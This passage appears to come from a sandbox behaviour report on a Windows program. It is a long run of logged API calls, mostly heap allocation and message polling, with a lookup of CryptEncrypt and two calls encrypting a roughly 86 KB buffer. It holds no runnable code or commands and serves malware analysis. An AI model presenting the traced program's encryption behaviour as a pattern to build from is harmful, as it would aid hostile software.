lpMsg=0x8ceef8) returned 0 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73aa0 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0112.754] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0112.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0112.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0112.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0112.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0112.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0112.755] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa498 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0112.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0112.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0112.755] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0112.756] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0112.756] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0112.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0112.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0112.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0112.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0112.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0112.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0112.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0112.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d50c8 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0112.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0112.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0112.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0112.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa468, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.812] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0112.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0112.813] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15075, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15078) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0112.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0112.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.813] CharLowerBuffW (in: lpsz="byte[86136]", cchLength=0xb | out: lpsz="byte[86136]") returned 0xb [0112.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.816] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.816] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0112.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0112.818] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d50c8*, pdwDataLen=0x8cef60*=0x15075, dwBufLen=0x15078 | out: pbData=0x37d50c8*, pdwDataLen=0x8cef60*=0x15078) returned 1 [0112.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.822] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0112.822] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.822] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0112.822] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.822] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.822] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: 